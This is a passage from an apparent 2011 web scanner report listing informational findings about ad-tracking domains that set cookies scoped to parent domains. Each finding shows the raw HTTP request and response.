Last-Modified: Thu, 17 Mar 2011 12:15:50 GMT
Content-Type: text/javascript
ntCoent-Length: 84353
Cache-Control: private
Content-Length: 84353
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:18:08 GMT
Connection: close
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Tue, 12-Jun-2012 11:18:08 GMT; Path=/

/*
* Copyright (c) 2000-2011 ChoiceStream, Inc. All Rights Reserved
*/
(function(){if(window.jQuery){var _jQuery=window.jQuery}var jQuery=window.jQuery=function(selector,context){return new jQuery.
...[SNIP]...

12.132. http://sync.adap.tv/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.adap.tv
Path:	/sync

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-13+04%3A02%3A42";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:22 GMT
rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jun+20+04%3A02%3A42+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sync?type=gif&key=turn&uid=4325897289836481830 HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-05-27+06%3A00%3A51"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1308466800,\"e\":1308466800,\"s\":[],\"a\":[]},\"7\":{\"f\":1308553200,\"e\":1308553200,\"s\":[1740],\"a\":[]},\"8\":{\"f\":1309071600,\"e\":1309071600,\"s\":[545],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-5394452744830899625__TIME__2011-06-13+04%3A02%3A42";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:22 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: rtbData0="key=turn:value=4325897289836481830:expiresAt=Mon+Jun+20+04%3A02%3A42+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Thu, 19-Feb-2043 12:49:22 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;

12.133. http://sync.mathtag.com/sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ts=1307964062; domain=.mathtag.com; path=/; expires=Tue, 12-Jun-2012 11:21:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530; mt_mop=9:1305510197|10004:1305981545|5:1305510879|3:1306525248|1:1305510843; ts=1307123743

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x2215 8725
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 13 Jun 2011 11:21:02 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4dd07bc8-e97b-118c-3dec-7b8c5c306530
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
Connection: Keep-Alive
Set-Cookie: ts=1307964062; domain=.mathtag.com; path=/; expires=Tue, 12-Jun-2012 11:21:02 GMT
Content-Length: 0

12.134. http://syndication.mmismm.com/tntwo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.mmismm.com
Path:	/tntwo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

U=Koc9bi_JRn2Zr7JGWUhM0g--; expires=Sun, 12-Jun-2016 17:01:37 GMT; path=/; domain=.mmismm.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F&r=&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:01:37 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=Koc9bi_JRn2Zr7JGWUhM0g--; expires=Sun, 12-Jun-2016 17:01:37 GMT; path=/; domain=.mmismm.com
Content-Length: 43
Content-Type: text/javascript

var msegs='';Mindset.handleResponse(msegs);

12.135. http://t.flux.com/tracking.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.flux.com
Path:	/tracking.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FTUID=BD68167B-8714-4A0A-8544-E6985A15524C; domain=flux.com; expires=Wed, 13-Jun-2012 11:18:58 GMT; path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tracking.gif?CMU=D3FCFFFF0002D51D0002FFFFFCD3&CUR=http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/&WN=ContentView HTTP/1.1
Host: t.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: Sat, 1 Jan 2000 00:00:00 GMT
Last-Modified: 6/13/2011 4:18:58 AM
Server: Microsoft-IIS/7.0
Set-Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C; domain=flux.com; expires=Wed, 13-Jun-2012 11:18:58 GMT; path=/; HttpOnly
Server: w02r
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wt
Date: Mon, 13 Jun 2011 11:18:58 GMT

GIF89a.............!.......,...........D..;

12.136. http://t.invitemedia.com/track_imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.invitemedia.com
Path:	/track_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"678220\": [1307964067+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/
camp_freq_p1="eJzjkuF4PZFNgEli8dPr71kUGDXug2gDJouDD4E0lwjH5PesAowSFxo2A2UZNBgMGCwYgKJvgXoYJc6iif5eCFI7F0307ksWoOiMDw0oojvnswpkSXx6jywqyjHzB4tAK7PEotOowru+sghMZJQ4t/z/O2ThWUAzrjFKXHn57x2y0WdfsAowS+x7eg9F9OMrsON2XUARnbURJHrr+0GEKAApL05s"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/
io_freq_p1="eJzjEudYEi/ALLH46fX3LAoMGgwGTBYHHwLZXMIcj2MEGCUuNGyGSjBYMAAFL4QCBeeiCT4NAArO+NCAJCjCsS1U4ACTxKf3qKI/AgVamSUWnUYVvRUoMJFR4tzy/++Qjd0cA3TZvqf3UASPglw1d9cFFMHucKDgre8HEYIAmzQ6HA=="; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_imp?partnerID=41&campID=100587&crID=122561&auctionID=1307963584748066-122561&cost=2.6775&pubICode=2085080&pub=220657&url=http%3A%2F%2Fthesouthern%2Ecom%2F HTTP/1.1
Host: t.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwCY4pMAAAAAAAn6JAAAAAAAAgAEAAYAAAAAAP8AAAACB4FnFAAAAAAA2NAfAAAAAABDfDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAu0kMAitH8z9mZmZmZmYHQOxRuB6FawVAAAAAAAAAGkDrUbgehWsFQAAAAAAAABpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBBGnvP9U-ClMwuEQyoHc3HZ8S59kPTfcOFYAWAAAAAA==,,http%3A%2F%2Fthesouthern.com%2F,Z%3D728x90%26_salt%3D194510286%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,1b27218a-95ae-11e0-b487-bfeed3f845e0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; dp_rec="{\"1\": 1305981628+ \"3\": 1305981281+ \"2\": 1305508826+ \"4\": 1305981633}"; partnerUID="eyIxNSI6IFsiMDA0MDAzMDAxNDAwMDAwNDQ5ODcyIiwgdHJ1ZV0sICIxMTMiOiBbIkZRV1dDMlZLMkRXRiIsIHRydWVdLCAiODQiOiBbIkZ6NitFUy9jOTlPNno1T0IiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0Mjk0XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDI3Ml19; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; camp_freq_p1="eJzjkuGY/J5VgFHiQsPm9ywKjBoN27a+ZzFgtADzuWQ43k5kA8qehcp2Nm4Gy56Fyv5eCNI7Fyo7d/EOsCyYzyXBcfclC1B2xocGsOyMcyCTGSwYuEQ4ds5nFciS+PQeJMOgwQAWFeWY+YNFoJVZYtFpVOFdX1kEJjJKnFv+/x2y8CygGdcYJa68/IckLMJx9gWrALPEvqf3UEQ/vgI7dNcFFNFZG0Git74fRIgCAGMOVek="; io_freq_p1="eJzjEuZ4HCPAKHGhYfN7FgNGCzDNJc6xJB4oeBbEUWDQYABKnIVKXAgFSsxFkgCzuYQ5ngYAJWZ8aIBKMFgwcIlwbAsVOMAk8ek9quiPQIFWZolFp1FFbwUKTGSUOLf8/zuEqDDH5hgBZol9T++hCB4FOXnurgsogt3hQMFb3w8iBAHgcj64"; segments_p1="eJwdkMFKAmEUhdGZxc+sfLD29Qo9hriIJF3YqiiirE1EpM5CkVyFk0TkJsoCIVCjUFBaGMw00/3O5vBx7uWc+/+B71ZdL/DdOMmZPv7mTT87OLM3uDZFFxP0QdPI2HPppmElwgi12FfAWQIfLeDmLXwsp79GL4oEz2N4ZPueGziTiO3LJ2b3Ci9uGR7uYw/U3IvhUoqGGU77Gv54h5+b8IGuK2UENJzht3r2WvRkG6DeEiqrsYK/eui0pePk17roj1pHQ04a6vQbPbIy0z9oevqinzlBr2JK6gWT8ja5qj5X4l3ZCwK3M8kVXtvVpW/O+o/tlBvHu1TUk/w/jaxtDA=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 13 Jun 2011 11:21:07 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 13-Jun-2011 11:20:47 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/
Set-Cookie: impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"594387\": [1305508826+ \"c76fa991-e8e9-36fa-8db6-64674e41b1c5\"+ 3236+ 40464+ 620]+ \"648697\": [1305981627+ \"TdeyuAAD1QgK5YAmcxVKhQ==\"+ 115193+ 62482+ 3931]+ \"678220\": [1307964067+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"650395\": [1305746717+ \"aff8f785-6bd0-31ca-97a4-49cafd80eda3\"+ 79272+ 59150+ 7406]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"648698\": [1305981630+ \"TdeyvAAIEhEK5YMHYIpYlA==\"+ 115188+ 62482+ 3931]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"578938\": [1306506452+ \"895314541263651941\"+ 186+ 789+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"580191\": [1307361309+ \"6341833618359868224\"+ 29707+ 11561+ 12332]}"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuF4PZFNgEli8dPr71kUGDXug2gDJouDD4E0lwjH5PesAowSFxo2A2UZNBgMGCwYgKJvgXoYJc6iif5eCFI7F0307ksWoOiMDw0oojvnswpkSXx6jywqyjHzB4tAK7PEotOowru+sghMZJQ4t/z/O2ThWUAzrjFKXHn57x2y0WdfsAowS+x7eg9F9OMrsON2XUARnbURJHrr+0GEKAApL05s"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEudYEi/ALLH46fX3LAoMGgwGTBYHHwLZXMIcj2MEGCUuNGyGSjBYMAAFL4QCBeeiCT4NAArO+NCAJCjCsS1U4ACTxKf3qKI/AgVamSUWnUYVvRUoMJFR4tzy/++Qjd0cA3TZvqf3UASPglw1d9cFFMHucKDgre8HEYIAmzQ6HA=="; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:07 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

12.137. http://tags.bluekai.com/site/2312 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2312

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bklc=4df5ee2b; expires=Wed, 15-Jun-2011 11:02:03 GMT; path=/; domain=.bluekai.com
bk=ePFVBn9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:02:03 GMT; path=/; domain=.bluekai.com
bkc=KJpMTsHQrB4vyve2f3LF/y1e9yKxlNis0Z29TXKy/wMEZOARIJTy1rM/F/Epr5eTr7vGd12oeYMXEtMXMtMXvi+DwQzSdTzkvFXesFXos7Iisuod9CG48eXR78mnQVcU59Rs1uHIuM13lfWOkxIiRUy8UQSsYaPsawTqBPH8Ac6ywQ95eDqz; expires=Sat, 10-Dec-2011 11:02:03 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2312 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101HSEKKAnksHQjzCnM121AVWy1M96Be9NBeV6Be/lLe9p1Mx01yWuCoSsaQRQhxe2Hxfm; bkst=KJh5Aean96WxCqz/vYShDVyDLqO5lBljljL+xyycAPmYQAk8+lLcvAx+RLeY0+8SgVNLHs+O0Y2//8SVSr5wzmfum5UylFeBpvrhNyPsBU78usgLM4okNG38ZJDW5sexscNdBuPdxFTZy0/pmSuK/bE9+4zoh8OswYoDg7B7gDSF7AFKkmq7tsCT1My5etXghY2Juy0NLySWOSz1vsBxt1cBJ2kJFqHOV0s1AaRbOSCOuM7ddDUt5q6Xx/zQGLyMpNtDzu7Hzyi88Nssl7MYW73gKriO8k5jr2UjfIyKfB7+yNffwnT1TfmTXwchEZM5PPrqM5kVJqx6uCLkbexxScGPjqlJV/wCCEXS2qoJF2X5gvp2Aw8mIQSEYisn7vv6CvEx1oWsvEpJlCjvtIjE0UCzdO4acfhCRY9=; bk=qEw5En9yk+ud8JkA; bkc=KJ0qhLp9ywKWADac83DF/y1eypxQ7yrBg0rc0FIzhGeYdTEsdTMsgfJY8UmQXU2RGF/dGws4GFW7Z3c0JbehRNQx4WTrOGj56hARhJeTvztG41zsPeb/CFckKOAR/kxjD4CFNaekx4qOI9eePMkT; bko=KJpERtjQRcfhlJKB/jX5yZJAXmSaL5uCn9TsPuOnHISkgyOegYOWM/7Ceku1CVWus6u1iIWLBywe2I4w4jAjJAJjM9yJw9y1zDIK9zV6TvhndO9V/T1mnTyPJyxhMTACWVG0vT1AcywerIOqxOt0xaq9hr+9tyYUlYXt; bkw5=KJh+AnAmQDWDHLIwyCjnQ3C6J9GHcHonJ4nlSeuVEkOGHYaHK9wJd08KHAvCLhDbfoQooke10VEmFj7flUyPtiswQQIipnLxTmYdNHYI4ypVaDL8CbvocE3xRuVNwAnCNCqCK9zM3DEXul0YzQ1zbqhwRVvjmOPMcZJZkG7HBAq2rqO1AGWhEIkjVijaphQNXXR0SEgs3OpfJA0pcZwDtfVopDP1LY17b7sDeUhz7q9F2yQ7PNaUd5FJIAKPEt4H6Ik5c4pCLtJ1I9VDi6n5

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:03 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4df5ee2b; expires=Wed, 15-Jun-2011 11:02:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=ePFVBn9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:02:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpMTsHQrB4vyve2f3LF/y1e9yKxlNis0Z29TXKy/wMEZOARIJTy1rM/F/Epr5eTr7vGd12oeYMXEtMXMtMXvi+DwQzSdTzkvFXesFXos7Iisuod9CG48eXR78mnQVcU59Rs1uHIuM13lfWOkxIiRUy8UQSsYaPsawTqBPH8Ac6ywQ95eDqz; expires=Sat, 10-Dec-2011 11:02:03 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 14-Jun-2011 11:02:03 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 14 Jun 2011 11:02:03 GMT
Cache-Control: max-age=86400, private
BK-Server: 45b2
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

12.138. http://tags.bluekai.com/site/2731 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2731

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=rWc5iq9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:18:54 GMT; path=/; domain=.bluekai.com
bkc=KJhqpzU9LcAp9TwzobIIM9y1evrO4m+VPcT1YTvF0zw96OUw0weZ/Tv4/RlvE6wMQdEeI/k9RkTl9XwMeN22ZSOXAe01pXcJyc9wSndtmTCbWnIheJU4Q1RcbR4hopWp1w92RVExAUAJ8lmCXUUkDwZ46hCxIJdxIOdHIaPV3cymBwTwuNEIOpEIDpEIHeBDdQx6wLCd1eT71e8tEV5QWWwiopuMXC6qDwAQsLSUTtPQiaOkHmsdDDmPO2AcTy19WS83Zx==; expires=Sat, 10-Dec-2011 11:18:54 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=cQ6991Cf6W6Oh0NB; bkst=KJh5Aean96WxCqz/vYShDVyDLqO5lBljljL+xyycAPmYQAk8+lLcvAx+RLeY0+8SgVNLHs+O0Y2//8SVSr5wzmfum5UylFeBpvrhNyPsBU78usgLM4okNG38ZJDW5sexscNdBuPdxFTZy0/pmSuK/bE9+4zoh8OswYoDg7B7gDSF7AFKkmq7tsCT1My5etXghY2Juy0NLySWOSz1vsBxt1cBJ2kJFqHOV0s1AaRbOSCOuM7ddDUt5q6Xx/zQGLyMpNtDzu7Hzyi88Nssl7MYW73gKriO8k5jr2UjfIyKfB7+yNffwnT1TfmTXwchEZM5PPrqM5kVJqx6uCLkbexxScGPjqlJV/wCCEXS2qoJF2X5gvp2Aw8mIQSEYisn7vv6CvEx1oWsvEpJlCjvtIjE0UCzdO4acfhCRY9=; bko=KJpERtjQRcfhlJKB/jX5yZJAXmSaL5uCn9TsPuOnHISkgyOegYOWM/7Ceku1CVWus6u1iIWLBywe2I4w4jAjJAJjM9yJw9y1zDIK9zV6TvhndO9V/T1mnTyPJyxhMTACWVG0vT1AcywerIOqxOt0xaq9hr+9tyYUlYXt; bkw5=KJh+AnAmQDWDHLIwyCjnQ3C6J9GHcHonJ4nlSeuVEkOGHYaHK9wJd08KHAvCLhDbfoQooke10VEmFj7flUyPtiswQQIipnLxTmYdNHYI4ypVaDL8CbvocE3xRuVNwAnCNCqCK9zM3DEXul0YzQ1zbqhwRVvjmOPMcZJZkG7HBAq2rqO1AGWhEIkjVijaphQNXXR0SEgs3OpfJA0pcZwDtfVopDP1LY17b7sDeUhz7q9F2yQ7PNaUd5FJIAKPEt4H6Ik5c4pCLtJ1I9VDi6n5; bklc=4df5ee2b; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101UfXTSLFDJvOkuWF1ETpHRqO01ex61eD6BEx6LMzy1n10Be/p9H/saGSVCi9a919PW6uv9==; bk=o5W9Tn9yk+ud8JkA; bkc=KJpE8saQb/o7jcMpXSLF/y1eQ0Sx70sB0A2eTXKy11e8iDOiUMzeyI1wUltjGc0xw/pwyz79zvIPQDcfcDx2iB2RCLoFxmme21wT68QjswiK1enG0n0WXf7xIno03wpwSxyGdW2Gd/2GdYGgPeTcsFIcJugd9hgdvHodGCA34y/ScIxdsJIEiTaCNlxsOMWA4AGpv+Ih9jDwGZaXmPTsCQCPHCEIspPDKjO21eT9VsPKIy==; bkdc=res

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:18:54 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 14 Jun 2011 11:18:54 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=rWc5iq9yk+ud8JkA; expires=Sat, 10-Dec-2011 11:18:54 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhqpzU9LcAp9TwzobIIM9y1evrO4m+VPcT1YTvF0zw96OUw0weZ/Tv4/RlvE6wMQdEeI/k9RkTl9XwMeN22ZSOXAe01pXcJyc9wSndtmTCbWnIheJU4Q1RcbR4hopWp1w92RVExAUAJ8lmCXUUkDwZ46hCxIJdxIOdHIaPV3cymBwTwuNEIOpEIDpEIHeBDdQx6wLCd1eT71e8tEV5QWWwiopuMXC6qDwAQsLSUTtPQiaOkHmsdDDmPO2AcTy19WS83Zx==; expires=Sat, 10-Dec-2011 11:18:54 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 14-Jun-2011 11:18:54 GMT; path=/; domain=.bluekai.com
BK-Server: 1ae0
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!.. ....,...........L..;

12.139. http://tags.bluekai.com/site/2736 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2736

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=v7chM9kKkhsd8JkA; expires=Sat, 10-Dec-2011 11:19:06 GMT; path=/; domain=.bluekai.com
